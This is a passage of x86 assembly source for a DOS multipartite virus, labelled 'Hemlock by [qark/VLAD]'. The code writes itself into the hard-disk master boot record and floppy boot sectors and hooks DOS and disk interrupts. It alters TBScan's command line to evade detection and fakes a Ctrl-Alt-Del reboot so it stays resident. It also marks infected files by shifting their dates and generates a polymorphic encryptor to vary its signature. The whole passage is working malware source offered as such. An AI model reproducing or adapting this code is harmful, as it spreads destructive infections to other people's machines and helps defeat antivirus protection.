1100.         mov     si,offset bootsector    ;Move our virus BS into the buffer.
1101.         push    cs
1102.         pop     ds                      ;DS=ES=CS
1103.         mov     di,offset end_virus
1104.         mov     cx,offset bs_end - offset bootsector
1105.         rep     movsb
1106.  
1107.         xor     ax,ax                   ;Reset disk controller
1108.         call    int13h
1109.        
1110.         mov     ax,103h
1111.         xor     dh,dh
1112.         inc     cx                      ;CX=0 from 'rep movsb'  So CX=1
1113.         mov     bx,offset end_virus
1114.         call    int13h
1115.  
1116.         mov     cx,4
1117.         or      dl,dl
1118.         js      hd_virus_write
1119.  
1120.         mov     cx,word ptr floppy_sect
1121.         mov     dh,byte ptr floppy_head
1122.  
1123. hd_virus_write:
1124.         xor     bx,bx
1125.         mov     ax,703h
1126.         call    int13h
1127.  
1128. bs_pop_end:
1129.         pop     es
1130.         pop     ds
1131.         pop     di
1132.         pop     si
1133.         pop     dx
1134.         pop     cx
1135.         pop     bx
1136.         pop     ax
1137.         popf
1138.         jmp     rend
1139.  
1140. bs_exit:
1141.         cmp     ax,0beefh
1142.         jne     no_test
1143.         iret
1144. no_test:
1145.         xchg    ah,al
1146.         db      0eah
1147.         i13     dd      0
1148. ;....................................
1149. Multipartite:
1150.         cmp     byte ptr cs:flag21,1            ;Have we already set int21 ?
1151.         jne     check21
1152.         jmp     short bs_exit
1153. check21:
1154.         push    ax
1155.         push    cx
1156.         push    si
1157.         push    di
1158.         push    es
1159.         push    ds
1160.  
1161.         cmp     byte ptr cs:qemm,1              ;Have we detected QEMM ?
1162.         je      qemm_multip
1163.  
1164.         ;This code looks for DOSDATA and if found waits for the 10th EXE
1165.         ;header instead of the first.
1166.  
1167.         mov     di,bx
1168.         mov     al,'D'
1169.         cld
1170.         mov     cx,512
1171. scan_dosdata:
1172.         repne   scasb
1173.         je      found_d
1174.         jmp     short chk_exe_header
1175. found_d:
1176.         push    cs
1177.         pop     ds
1178.         mov     si,offset dosdata
1179.         push    di                      ;Save buffer pointer
1180.         push    cx                      ;Save buffer counter
1181.         mov     cx,6
1182.         repe    cmpsb
1183.         pop     cx
1184.         pop     di
1185.         jne     scan_dosdata
1186.  
1187.         mov     byte ptr qemm,1
1188.         mov     byte ptr mz_counter,10
1189.  
1190. qemm_multip:
1191.  
1192.         ;Multipartite condition #1 - Grab Int21 on any write
1193.  
1194.         cld
1195.         cmp     al,3
1196.         je      set_dos_vector
1197.        
1198.         ;Multipartite condition #2 - Grab Int21 on a residency test
1199.  
1200.         or      bx,bx           ;SYS res tests shouldn't be used.
1201.         jz      chk_autoexec
1202.         cmp     ax,0beefh
1203.         je      set_dos_vector
1204.  
1205.         ;Multipartite condition #3 - Grab Int21 on reading AUTOEXEC.BAT
1206. chk_autoexec:
1207.         mov     si,bx
1208.         push    es
1209.         pop     ds
1210.  
1211.         lodsb
1212.         cmp     al,'@'
1213.         jne     chk_exe_header
1214.         lodsw
1215.         and     ax,0dfdfh
1216.         cmp     ax,'CE'
1217.         jne     chk_exe_header
1218.         jmp     short set_dos_vector
1219.        
1220.         ;Multipartite condition #4 - Grab Int21 on read of third EXE
1221.  
1222. chk_exe_header:
1223.         push    es
1224.         pop     ds
1225.         mov     si,bx
1226.         lodsw
1227.         cmp     ax,'MZ'
1228.         je      found_mz
1229.         cmp     ax,'ZM'
1230.         jne     not_right
1231. found_mz:
1232.         dec     byte ptr cs:mz_counter
1233.         jz      set_dos_vector
1234.         jmp     short not_right
1235.        
1236. set_dos_vector:
1237.         push    cs
1238.         pop     es
1239.         xor     ax,ax
1240.         mov     ds,ax
1241.         mov     si,21h*4
1242.         mov     di,offset i21
1243.         movsw
1244.         movsw
1245.         mov     word ptr [si-4],offset int21handler
1246.         mov     word ptr [si-2],es
1247.         mov     byte ptr cs:flag21,1
1248. not_right:
1249.         pop     ds
1250.         pop     es
1251.         pop     di
1252.         pop     si
1253.         pop     cx
1254.         pop     ax
1255.         cmp     ax,0beefh
1256.         jne     not_res_test
1257.         iret                            ;Pass back the residency marker.
1258. not_res_test:
1259.         jmp     bs_exit
1260. ;....................................
1261. Int13h  Proc    Near
1262. ; AH & AL are swapped on entry to this call.
1263.  
1264.         pushf                   ;Setup our interrupt
1265.         push    cs              ;Our segment
1266.         call    bs_exit         ;This will also fix our AX
1267.         xchg    ah,al           ;Fix our AX :)
1268.         ret
1269.  
1270. Int13h  EndP
1271. ;....................................
1272. Int9Handler:
1273. ;Checks for CTRL-ALT-DEL and does a fake reboot if so.
1274.  
1275.         push    ax
1276.         push    ds
1277.         push    cx
1278.        
1279.         in      al,60h                  ;Read the key from the keyboard port
1280.         cmp     al,53h                  ;Is the key DEL ?
1281.         jne     normal_i9
1282.  
1283.         xor     ax,ax
1284.         mov     ds,ax
1285.         mov     al,[417h]               ;Keyboard flag byte 0
1286.         and     al,0ch                  ;Only leave CTRL and ALT
1287.         cmp     al,0ch                  ;Are they both depressed ?
1288.         jne     normal_i9
1289.  
1290.         ;Now test for an XT
1291.         mov     al,2
1292.         mov     cl,33
1293.         shr     al,cl           ;286+ ignore any bits above bit 5
1294.         test    al,1            ;286+ will only SHR AL,1 while XT will
1295.                                 ;clear AL.
1296.         jz      reboot          ;We have an 8088 (XT) so reboot.
1297.         smsw    ax              ;Machine Status Word into AX
1298.         test    al,1            ;If bit 1 is on then it is protected mode
1299.         jnz     normal_i9       ;Protected mode... no fake reboot.
1300. reboot:
1301.         in      al,61h                  ;Keyboard controller.
1302.         push    ax
1303.         or      al,80h                  ;Signal we got it.
1304.         out     61h,al
1305.         pop     ax
1306.         out     61h,al
1307.        
1308.         mov     al,20h                  ;Signal EOI
1309.         out     20h,al
1310.  
1311.         xor     ax,ax
1312.         mov     al,byte ptr cs:mode     ;Reset original video mode.
1313.         int     10h
1314.  
1315.         push    ds
1316.         pop     es                      ;ES=0
1317.         push    cs
1318.         pop     ds                      ;DS=CS
1319.         mov     cx,1024
1320.         mov     si,offset IVT
1321.         xor     di,di
1322.         cld
1323.        
1324.         cli
1325.         rep     movsb                   ;Copy the IVT back.
1326.         sti
1327.         push    cs
1328.         pop     ds
1329.  
1330.         mov     byte ptr flag21,0               ;Reset the int21 flag
1331.         mov     byte ptr mz_counter,1           ;Reset exe counter
1332.         mov     byte ptr qemm,0                 ;Reset qemm flag
1333.  
1334.         xor     dx,dx
1335.         int     19h
1336.  
1337. normal_i9:
1338.         pop     cx
1339.         pop     ds
1340.         pop     ax
1341.  
1342.         db      0eah
1343.         i9      dd      0
1344. ;....................................
1345. Int15h  Proc    Near
1346.         db      0eah
1347.         i15     dd      0
1348. Int15h  EndP
1349. ;....................................
1350. Int24h  Proc    Near                    ;No write protect errors.
1351.         mov     al,3
1352.         iret
1353.         i24     dd      0
1354. Int24h  EndP
1355. ;....................................
1356. ;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
1357. ;               Subroutines and Shit
1358. ;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
1359. ;....................................
1360. Get_Date:
1361. ;Saves the date/time of the file to TIME and DATE
1362. ;BX=File handle
1363.         push    ax
1364.         push    cx
1365.         push    dx
1366.         mov     ax,57h
1367.         call    int21h
1368.         mov     word ptr cs:time,cx
1369.         mov     word ptr cs:date,dx
1370.         pop     dx
1371.         pop     cx
1372.         pop     ax
1373.         ret
1374. ;....................................
1375. Set_Marker:
1376. ;Sets the 100 years marker on the infected file.
1377. ;BX=File handle
1378.  
1379.         db      0bah            ;MOV DX,xxxx
1380.         date    dw      0
1381.         db      0b9h
1382.         time    dw      0       ;MOV CX,xxxx
1383.  
1384.         add     dh,200          ;100 SHL 1 = 200
1385.         mov     ax,157h
1386.         call    int21h
1387.         ret
1388. ;....................................
1389. Check_Years:
1390. ;Assumes ES:DI = SFT
1391. ;On exit the flags will be set so that a JB means that the file isn't
1392. ;infected. JA means it is.
1393.         cmp     byte ptr es:[di+010h],200
1394.         ret
1395. ;....................................
1396. Get_SFT:
1397. ;Entry: BX=Filehandle
1398. ;Exit: ES:DI=SFT
1399.         push    bx
1400.         push    ax
1401.         mov     ax,1220h
1402.         int     2fh
1403.         jc      bad_sft
1404.         xor     bx,bx
1405.         mov     bl,byte ptr es:[di]
1406.         mov     ax,1216h
1407.         int     2fh
1408. bad_sft:
1409.         pop     ax
1410.         pop     bx
1411.         ret
1412. ;....................................
1413. LSeek_End:
1414.         mov     ax,0242h                ;Call this to lseek to the end
1415.         jmp     short lseek
1416. LSeek_Start:                            ;Call this to lseek to the start
1417.         mov     ax,42h
1418. LSeek:
1419.         cwd
1420.         xor     cx,cx
1421.         call    int21h
1422.         ret
1423. ;....................................
1424. Check_Names:
1425. ;On Entry DS:DX=filename to execute
1426.  
1427. ;Exit: put ' co nm' into the command line if program is TBScan.  The 'co'
1428. ;will cause TBScan to use DOS instead of it's low level disk routines
1429. ;and subsequently it will not find any change in files.  The 'nm' means
1430. ;there will be no memory test.  This is just for in the future when Thunder
1431. ;Byte get the virus signature they won't be able to detect residency of the
1432. ;virus.
1433.  
1434. ;Turn stealth off if one of the program being executed is a bad one.
1435.  
1436.         push    ax
1437.         push    bx
1438.         push    cx
1439.         push    dx
1440.         push    si
1441.         push    di
1442.         push    ds
1443.         push    es
1444.         ;Test for tbscan
1445.         mov     si,dx
1446. find_ext:
1447.         lodsb
1448.         cmp     al,'.'                  ;The dot in the filename.
1449.         jne     find_ext
1450.         std
1451.  
1452.         lodsw                   ;SI-2
1453.         ;SI=Last letter in name.
1454.  
1455.         xor     cx,cx
1456.         mov     di,offset bad_names-1
1457.         push    cs
1458.         pop     es
1459. name_loop:
1460.         mov     cl,byte ptr cs:[di]     ;CS:DI=Size of string
1461.         dec     di                      ;Index to end of name.
1462.         push    si                      ;Save SI
1463.         repe    cmpsb                   ;Compare the names.
1464.         pop     si                      ;Restore SI
1465.         je      found_name              ;We got one!
1466.         sub     di,cx                   ;Next name
1467.         cmp     di,offset bad_finish
1468.         jbe     tail_fail
1469.         jmp     short name_loop
1470.        
1471. found_name:
1472.         cmp     di,offset bad_finish    ;TBSCAN gets different treatment.
1473.         jbe     tbscan_found
1474.  
1475.         cmp     di,offset bad_win
1476.         jbe     win_found
1477.  
1478.         mov     byte ptr cs:stealth,0   ;Turn stealth off.
1479.         jmp     short tail_fail
1480.  
1481. TBSCAN_Found:
1482.         ;Change command line
1483.         cld
1484.         pop     es                      ;ES was last thing pushed.
1485.         push    es                      ;ES=Param Block segment.
1486.         mov     di,word ptr es:[bx+2]   ;Grab command tail from param block
1487.         mov     si,di
1488.         mov     ax,word ptr es:[bx+4]
1489.         mov     es,ax
1490.         mov     ds,ax                   ;DS:SI=ES:DI=Command tail
1491.  
1492.         inc     di                      ;Past tail count.
1493.  
1494.         cmp     byte ptr [si],0         ;No parameters!
1495.         je      write_tail
1496.  
1497.         mov     cx,127                  ;Length of tail.
1498.         mov     al,0dh
1499.         repne   scasb
1500.         jne     tail_fail
1501.  
1502.         dec     di                      ;DI = 0D end of command line.
1503.  
1504. write_tail:
1505.         add     byte ptr [si],6
1506.         push    cs
1507.         pop     ds
1508.         mov     si,offset tail_fix
1509.         mov     cx,7
1510.         rep     movsb
1511.         jmp     tail_fail
1512.  
1513. win_found:
1514.         cld
1515.         pop     es                      ;ES was last thing pushed.
1516.         push    es                      ;ES=Param Block segment.
1517.         mov     di,word ptr es:[bx+2]   ;Grab command tail from param block
1518.         mov     si,di
1519.         mov     ax,word ptr es:[bx+4]
1520.         mov     es,ax
1521.         mov     ds,ax                   ;DS:SI=ES:DI=Command tail
1522.  
1523.         inc     di                      ;Past tail count.
1524.  
1525.         cmp     byte ptr [si],0         ;No parameters!
1526.         je      write_win_tail
1527.  
1528.         mov     cx,127                  ;Length of tail.
1529.         mov     al,0dh
1530.         repne   scasb
1531.         jne     tail_fail
1532.  
1533.         dec     di                      ;DI = 0D end of command line.
1534.  
1535. write_win_tail:
1536.         add     byte ptr [si],5
1537.         push    cs
1538.         pop     ds
1539.         mov     si,offset win_fix
1540.         mov     cx,6
1541.         rep     movsb
1542.  
1543. tail_fail:
1544.         cld                             ;Gotta keep the forward scan.
1545.         pop     es
1546.         pop     ds
1547.         pop     di
1548.         pop     si
1549.         pop     dx
1550.         pop     cx
1551.         pop     bx
1552.         pop     ax
1553.         ret
1554.  
1555.         ;We are scanning backwards because it is smaller than searching
1556.         ;for the \ in the filename.
1557.         Bad_finish      db      'TBSCAN',6
1558.         Bad_win         db      'WIN',3
1559.                         db      'CHKDSK',6
1560.                         db      'PKZIP',5
1561.                         db      'ARJ',3
1562.                         db      'NDD',3
1563.                         db      'SCANDISK',8
1564.                         db      'LHA',3
1565.         Bad_names:                              ;Scan from here...
1566.  
1567.         tail_fix        db      ' co nm',0dh    ;<- insert this
1568.         win_fix         db      ' /d:f',0dh     ;make windows use 16bit disk
1569.                                                 ;access
1570. ;....................................
1571. Check_Handle:
1572. ;BX=File handle
1573. ;Carry if bad handle.
1574.         push    ax
1575.         push    dx
1576.         mov     ax,44h
1577.         call    int21h                  ;Get device info.
1578.         jc      bad_handle              
1579.         shl     dl,1                    ;If bit 7=1 then not a file.
1580.                                         ; SHLing it will set the carry
1581.                                         ; flag based on bit 7
1582.         jmp     short handle_exit
1583. bad_handle:
1584.         stc
1585. handle_exit:
1586.         pop     dx
1587.         pop     ax
1588.         ret
1589. ;....................................
1590. Anti_Tunnel:
1591.         push    ax                      ;Disable any tunnelers.
1592.         push    bx
1593.         push    si
1594.         push    ds
1595.  
1596.         xor     ax,ax
1597.         mov     ds,ax                   ;Vector table
1598.         lds     si,[1*4]                ;DS:SI=Int 1 Address
1599.         mov     bl,byte ptr [si]        ;Save first byte of it.
1600.         mov     byte ptr [si],0cfh      ;Move an IRET at the entry point.
1601.  
1602.         pushf                           ;Flags on stack.
1603.         pop     ax                      ;Flags into AX
1604.         and     ah,0feh                 ;Remove trap flag.
1605.         push    ax                      ;Flags back on stack
1606.         popf                            ;Set flags without any trap on.
1607.  
1608.         mov     byte ptr [si],bl        ;Restore entry point.
1609.  
1610.         pop     ds
1611.         pop     si
1612.         pop     bx
1613.         pop     ax
1614.         ret
1615. ;....................................
1616. Check_MBR:
1617. ;Assumes SI=Delta
1618. ;On exit: JE infected  JNE not infected
1619.         push    ax
1620.         push    bx
1621.         push    cx
1622.         push    dx
1623.         push    es
1624.  
1625.         push    cs
1626.         pop     es
1627.  
1628.         mov     ax,201h
1629.         lea     bx,[si+offset end_virus]
1630.         mov     cx,1
1631.         mov     dx,80h
1632.         int     13h
1633.  
1634.         cmp     word ptr es:[bx+offset marker - offset bootsector],'uE'
1635.  
1636.         pop     es
1637.         pop     dx
1638.         pop     cx
1639.         pop     bx
1640.         pop     ax
1641.         ret
1642. ;....................................
1643. SetROM15_13:
1644. ;Sets int15/13 to the ROM vector (if it can find it)
1645. ;SI=Delta
1646.         push    ax
1647.         push    si
1648.         push    di
1649.         push    ds
1650.         push    es
1651.  
1652.         cld
1653.         mov     di,si                   ;DI=Delta
1654.         mov     ax,0f000h               ;ROM BIOS segment
1655.         mov     ds,ax
1656.         mov     si,[0ff0dh]             ;ROM interrupt table
1657.         lodsb
1658.         cmp     al,0e9h
1659.         je      found_rom15
1660.         mov     si,0f859h               ;The IBM standard int15 address
1661.         lodsb
1662.         cmp     al,0e9h                 ;Is there a JMP there ?
1663.         jne     find_rom13
1664. found_rom15:
1665.         dec     si
1666.         push    ds
1667.        
1668.         push    cs
1669.         pop     ds                      ;DS=CS
1670.  
1671.         xor     ax,ax
1672.         mov     es,ax                   ;ES=0
1673.         push    es:[15h*4]
1674.         pop     [di+offset i15]         ;Save the offset
1675.         mov     es:[15h*4],si           ;Set the offset
1676.  
1677.         push    es:[15h*4+2]
1678.         pop     [di+offset i15+2]       ;Save the segment
1679.         mov     es:[15h*4+2],0f000h     ;Set the segment
1680.        
1681.         pop     ds
1682. find_rom13:
1683.         xor     si,si
1684.         inc     si
1685. search13:
1686.         cmp     si,0fff0h               ;Most AMIBIOSes just have this
1687.         jae     not_present13           ;signature at their int13 entry
1688.         dec     si                      ;point.  In fact every one I looked
1689.         lodsw                           ;at had it.
1690.         cmp     ax,0fa80h
1691.         jne     search13
1692.         lodsw
1693.         cmp     ax,0fb80h
1694.         jne     search13
1695.         lodsb
1696.         cmp     al,0fch
1697.         jne     search13
1698.         sub     si,5
1699.  
1700.         xor     ax,ax
1701.         mov     ds,ax
1702.         push    cs
1703.         pop     es
1704.         mov     ax,si           ;AX=Offset of int13handler
1705.         mov     si,13h*4
1706.         lea     di,[di+offset i13]
1707.         movsw
1708.         movsw
1709.         mov     word ptr [si-4],ax
1710.         mov     word ptr [si-2],0f000h
1711.  
1712. not_present13:
1713.         pop     es
1714.         pop     ds
1715.         pop     di
1716.         pop     si
1717.         pop     ax
1718.  
1719.         ret
1720. ;....................................
1721. Infect_MBR:
1722. ;Infects the hard disk MBR
1723.  
1724. ;SI=Delta Offset
1725.  
1726.         push    ax
1727.         push    bx
1728.         push    cx
1729.         push    dx
1730.         push    ds
1731.         push    es
1732.  
1733.         xor     ax,ax
1734.         mov     dx,80h
1735.         int     13h
1736.  
1737.         lea     bx,[si+offset end_virus]
1738.         push    cs
1739.         pop     es
1740.         mov     ax,201h
1741.         mov     cx,1
1742.         int     13h
1743.  
1744.         mov     ax,301h
1745.         mov     cl,3
1746.         int     13h
1747.  
1748.         push    cs
1749.         pop     ds              ;CS=DS=ES
1750.  
1751.         push    si
1752.         lea     di,[si+offset end_virus]
1753.         add     si,offset bootsector
1754.         mov     cx,offset bs_end - offset bootsector
1755.         cld
1756.         rep     movsb
1757.         pop     si
1758.        
1759.         lea     di,[si+offset end_virus + 510]
1760.         mov     ax,0aa55h
1761.         stosw                   ;Put the bootsector marker in.
1762.  
1763.         lea     bx,[si+offset end_virus]
1764.         mov     cx,1
1765.         mov     ax,301h
1766.         int     13h
1767.  
1768.         mov     cx,4
1769.         mov     ax,307h
1770.         mov     bx,si
1771.         int     13h
1772.  
1773.         pop     es
1774.         pop     ds
1775.         pop     dx
1776.         pop     cx
1777.         pop     bx
1778.         pop     ax
1779.  
1780.         ret
1781. ;....................................
1782. Reset15_13:
1783. ;Resets int13/15 to original vectors.
1784. ;SI=Delta offset
1785.  
1786.         push    ax
1787.         push    si
1788.         push    di
1789.         push    ds
1790.         push    es
1791.  
1792.         push    si
1793.        
1794.         push    cs
1795.         pop     ds              ;DS=CS
1796.        
1797.         xor     ax,ax
1798.         mov     es,ax           ;ES=0
1799.  
1800.         add     si,offset i15
1801.         mov     di,15h*4
1802.         cld
1803.         movsw
1804.         movsw                   ;Restore int15
1805.  
1806.         pop     si              ;Restore SI=Delta
1807.  
1808.         add     si,offset i13
1809.         mov     di,13h*4
1810.         movsw
1811.         movsw                   ;Restore int13
1812.        
1813.         pop     es
1814.         pop     ds
1815.         pop     di
1816.         pop     si
1817.         pop     ax
1818.  
1819.         ret
1820. ;....................................
1821. Set_Int24:
1822. ;Sets int24 to our handler
1823.         push    ax
1824.         push    si
1825.         push    di
1826.         push    ds
1827.         push    es
1828.  
1829.         xor     ax,ax
1830.         mov     ds,ax
1831.         push    cs
1832.         pop     es
1833.         mov     si,24h*4
1834.         mov     di,offset i24
1835.         cld
1836.         movsw
1837.         movsw
1838.         mov     word ptr [si-4],offset int24h
1839.         mov     word ptr [si-2],cs
1840.        
1841.         pop     es
1842.         pop     ds
1843.         pop     di
1844.         pop     si
1845.         pop     ax
1846.         ret
1847. ;....................................
1848. Reset_Int24:
1849. ;Restores int24
1850.         push    ax
1851.         push    si
1852.         push    di
1853.         push    ds
1854.         push    es
1855.  
1856.         xor     ax,ax
1857.         mov     es,ax
1858.         push    cs
1859.         pop     ds
1860.         mov     si,offset i24
1861.         mov     di,24h*4
1862.         cld
1863.         movsw
1864.         movsw
1865.         pop     es
1866.         pop     ds
1867.         pop     di
1868.         pop     si
1869.         pop     ax
1870.         ret
1871. ;....................................
1872. Setup_Poly:
1873. ;Copies the virus code into the buffer after the virus, generates the
1874. ;polymorphic decryptor/encryptor and encrypts it.
1875.  
1876.         push    ax
1877.         push    bx
1878.         push    cx
1879.         push    dx
1880.         push    si
1881.         push    di
1882.         push    ds
1883.         push    es
1884.         push    bp
1885.  
1886.         push    cs
1887.         push    cs
1888.         pop     ds
1889.         pop     es
1890.         mov     bp,word ptr delta
1891.         mov     cx,offset enc_end - offset enc_start
1892.         xor     di,di
1893.         call    poly
1894.  
1895.         xor     si,si
1896.         mov     di,offset end_virus
1897.         mov     cx,di
1898.         rep     movsb
1899.  
1900.         mov     al,byte ptr cipher_val
1901.         mov     si,offset end_virus + offset enc_start
1902.         mov     cx,offset enc_end - offset enc_start - 1
1903.         call    enc_loop
1904.  
1905.         pop     bp
1906.         pop     es
1907.         pop     ds
1908.         pop     di
1909.         pop     si
1910.         pop     dx
1911.         pop     cx
1912.         pop     bx
1913.         pop     ax
1914.         ret
1915. ;....................................
1916. Poly    Proc    Near
1917. ;;ES:DI=buffer
1918. ;;CX=size of enc buffer
1919. ;;BP=delta offset
1920.  
1921. ;AL=cipher
1922. ;SI=pointer
1923. ;CX=counter
1924.  
1925. ;  The basic algorithm for the polymorphism
1926.  
1927. ;        mov     al,0
1928. ;        mov     si,offset encstart
1929. ;        push    si
1930. ;        mov     cx,200
1931. ;encloop:
1932. ;        xor     byte ptr cs:[si]
1933. ;        ror     al,1
1934. ;        ror     al,1
1935. ;        inc     si
1936. ;        dec     cx
1937. ;        or      cx,cx
1938. ;        jns     encloop
1939. ;encstart:
1940. ;        ret
1941.  
1942.         push    ax
1943.         push    bx
1944.         push    cx
1945.         push    dx
1946.         push    si
1947.         push    di
1948.         push    ds
1949.         push    es
1950.         cld
1951.  
1952.         push    cs
1953.         pop     ds
1954.  
1955.         in      al,40h
1956.         mov     byte ptr cipher_val,al
1957.         xor     dx,dx
1958. retry_var:
1959.         cmp     dl,7
1960.         je      past_first
1961.         in      al,40h
1962.         and     al,3
1963.         cmp     al,4
1964.         je      retry_var
1965.         dec     al
1966.         js      set_cx
1967.         jz      set_si
1968. set_al:
1969.         test    dl,1
1970.         jnz     retry_var
1971.         or      dl,1
1972.         mov     al,0b0h                 ;MOV AL,xx
1973.         stosb
1974.         mov     al,byte ptr cipher_val
1975.         stosb
1976.         jmp     short retry_var
1977. set_cx:
1978.         test    dl,2
1979.         jnz     retry_var
1980.         or      dl,2
1981.         mov     al,0b9h                 ;MOV CX,xxxx
1982.         stosb
1983.         mov     ax,cx
1984.         dec     ax                      ;less one because of the JNS
1985.         stosw
1986.         jmp     short retry_var
1987. set_si:
1988.         test    dl,4
1989.         jnz     retry_var
1990.         or      dl,4
1991.         mov     al,0beh                 ;MOV SI,xxxx
1992.         stosb
1993.         mov     ax,bp        
1994.         add     ax,offset enc_start
1995.         stosw
1996.         mov     al,56h                  ;PUSH SI        
1997.         stosb
1998.         jmp     retry_var
1999.  
2000. past_first:
2001.         ;Just do a crap instruction so that our JNS xxxx won't be the same.
2002.         ;It just reads instructions out of DATABASE1
2003.  
2004.         xor     dx,dx
2005.  
2006. retry_second:
2007.         mov     word ptr jmp_calc,di
2008.         mov     si,offset database1
2009.         in      al,40h
2010.         and     ax,6                    ;3*2
2011.         add     si,ax
2012.         movsw
2013. redo_table:
2014.         cmp     dl,31
2015.         je      past_second
2016.         mov     si,offset random_table
2017.         in      al,40h
2018.         and     ax,14
2019.         cmp     ax,8
2020.         ja      redo_table
2021.         add     si,ax
2022.         lodsw
2023.         call    ax
2024.         jmp     short redo_table
2025.  
2026. set_xor:
2027.         test    dl,1
2028.         jnz     garbage1
2029.         or      dl,1
2030.         mov     al,02eh                 ;CS:
2031.         stosb
2032.         mov     ax,430h                 ;BYTE PTR [SI],AL
2033.         stosw
2034.         ret
2035.  
2036. garbage1:                               ;Random AL garbler
2037.         test    dl,2
2038.         jnz     garbage2
2039.         or      dl,2
2040.         jmp     short do_garbage
2041.  
2042. garbage2:
2043.         test    dl,4
2044.         jnz     inc_si
2045.         or      dl,4
2046. do_garbage:
2047.         mov     si,offset database2     ;Garbage database
2048.         in      al,40h
2049.         and     ax,7
2050.         shl     ax,1
2051.         add     si,ax
2052.         movsw
2053.         ret
2054.  
2055. inc_si:
2056.         test    dl,8
2057.         jnz     dec_cx
2058.         or      dl,8
2059.         mov     al,46h                  ;INC SI
2060.         stosb
2061.         ret
2062.  
2063. dec_cx:
2064.         test    dl,16
2065.         jnz     set_xor
2066.         or      dl,16
2067.         mov     al,49h                  ;DEC CX
2068.         stosb
2069.         ret
2070.  
2071. past_second:
2072.         xor     dx,dx
2073. redo_second:
2074.         cmp     dl,3
2075.         je      do_ret
2076.         in      al,40h
2077.         and     al,1
2078.         cmp     al,0
2079.         je      one_byte1
2080. or_cx_cx:
2081.         test    dl,1
2082.         jnz     one_byte1
2083.         or      dl,1
2084.         mov     si,offset database4
2085.         in      al,40h
2086.         and     ax,1
2087.         add     si,ax                   ;Index to a compare instruction
2088.         movsb
2089.         mov     al,0c9h                 ;CX,CX
2090.         stosb
2091.         ;jge, jns etc
2092.         mov     si,offset database5
2093.         in      al,40h
2094.         and     ax,1
2095.         add     si,ax
2096.         movsb                           ;Put a JGE/JNS in.
2097.         mov     ax,di
2098.         inc     ax                      ;Calculate the jump.
2099.         sub     ax,word ptr jmp_calc
2100.         mov     ah,al
2101.         in      al,40h
2102.         and     al,2
2103.         sub     ah,al
2104.         mov     al,ah
2105.         neg     al
2106.         stosb
2107.         jmp     redo_second
2108.  
2109.  
2110. one_byte1:
2111.         test    dl,2
2112.         jnz     or_cx_cx
2113.         or      dl,2
2114.         mov     si,offset database3     ;One byte crap
2115.         in      al,40h
2116.         and     ax,7
2117.         add     si,ax
2118.         movsb
2119.         jmp     redo_second
2120. do_ret:
2121.  
2122.         mov     si,offset database3
2123.         in      al,40h
2124.         and     ax,7            ;0-7
2125.         add     si,ax           ;Index into table
2126.         lodsb
2127.         mov     ah,0c3h         ;RET
2128.         mov     dx,ax
2129.         in      al,40h
2130.         and     ax,7
2131.         mov     cx,ax
2132. swap_pos:
2133.         xchg    dh,dl
2134.         loop    swap_pos
2135.         mov     ax,dx
2136.         stosw                   ;Store the one byte crap/ret combination
2137.         pop     es
2138.         pop     ds
2139.         pop     di
2140.         pop     si
2141.         pop     dx
2142.         pop     cx
2143.         pop     bx
2144.         pop     ax
2145.         ret
2146.  
2147. random_table    dw      offset set_xor
2148.                 dw      offset garbage1
2149.                 dw      offset garbage2
2150.                 dw      offset inc_si
2151.                 dw      offset dec_cx
2152.        
2153. database1:                              ;Utter crap
2154.                 xchg    bx,dx
2155.                 mov     bl,9
2156.                 xor     dx,dx
2157.                 sub     bx,bx
2158. database2:                              ;AL garblers
2159.                 ror     al,1
2160.                 add     al,07ah
2161.                 sub     al,0e0h
2162.                 dec     al
2163.                 sub     al,0b2h
2164.                 dec     al
2165.                 add     al,81h
2166.                 ror     al,1
2167.  
2168. database3:                      ;One byte crap
2169.                 cld
2170.                 dec     dx
2171.                 inc     bx
2172.                 scasb
2173.                 inc     di
2174.                 dec     di
2175.                 inc     dx
2176.                 dec     bx
2177. database4:
2178.                 db      0bh     ;OR xx,xx
2179.                 db      23h     ;AND xx,xx
2180. database5:
2181.                 db      79h     ;JNS
2182.                 db      7dh     ;JGE
2183.  
2184. cipher_val      db      0
2185. jmp_calc        dw      0
2186.  
2187. Poly    EndP
2188. ;....................................
2189. ;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
2190.  
2191. VirusName       db      'Hemlock by [qark/VLAD]',0
2192.  
2193. delta           dw      0               ;delta offset
2194. qemm            db      0               ;0=no qemm
2195. dosdata         db      'OSDATA'        ;DOSDATA.SYS
2196. flag21          db      0
2197. mz_counter      db      1
2198. stealth         db      1               ;0=no stealth
2199. filetype        db      'C'             ;C=COM S=SYS E=EXE
2200. virus_jump      db      0e9h,0,0
2201. enc_end:
2202.                 db      0               ;The polymorphics will encrypt this
2203.                                         ;byte sometimes.
2204. header          db      0cdh,20h,16h dup (0)
2205.  
2206. end_virus:                      ;<-- Our virus length
2207.  
2208.                 db      offset end_virus dup (0)
2209.                 db      100 dup (0)
2210. Mem_Size:
2211. IVT             db      1024    dup (0)
2212.         mode    db      0
2213.